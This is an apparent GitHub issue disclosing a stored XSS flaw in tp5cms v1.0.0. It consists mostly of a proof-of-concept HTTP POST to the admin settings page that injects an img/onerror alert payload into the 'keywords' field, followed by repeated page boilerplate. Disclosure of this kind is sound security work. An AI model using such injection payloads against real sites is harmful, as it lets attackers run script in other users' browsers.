tp5cms v1.0.0 has XSS vulnerability #8

XD-519 · 2021-04-14T08:56:47Z

A xss vulnerability was discovered in tp5 v1.0.0
Poc:

POST /tp5cms/admin.php/system/set.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------305965989412446621523406000615
Content-Length: 440
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/tp5cms/admin.php/system/set.html
Cookie: Hm_lvt_e2ecc5a8268ea1a4c9862ec7b4ee5b11=1616071270,1616593944; UIA=LnYsM2ArXDEvK14uYl80MjdiLjIuMi1bMzVkNGA2MS41K18zLF4yXmM0NGMsK2EtLjBfNDIvKjI0NWRfYjYwLjNf; SESSaca5a63f4c2fc739381fab7741d68783=n11Zs1mLNKhaiuuCo-dWUHMUcx6LVhgqmKzBVLUdp0s; __atuvc=1%7C12; PHPSESSID=kiqmpq7bdvenup0sg9t3euflio; Hm_lpvt_e2ecc5a8268ea1a4c9862ec7b4ee5b11=1616643419
Upgrade-Insecure-Requests: 1

-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="title"

11
-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="keywords"

"><img src=xss onerror=alert(1)>
-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="description"

1
-----------------------------305965989412446621523406000615--

Result：

The text was updated successfully, but these errors were encountered:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

tp5cms v1.0.0 has XSS vulnerability #8

tp5cms v1.0.0 has XSS vulnerability #8

XD-519 commented Apr 14, 2021

tp5cms v1.0.0 has XSS vulnerability #8

tp5cms v1.0.0 has XSS vulnerability #8

Comments

XD-519 commented Apr 14, 2021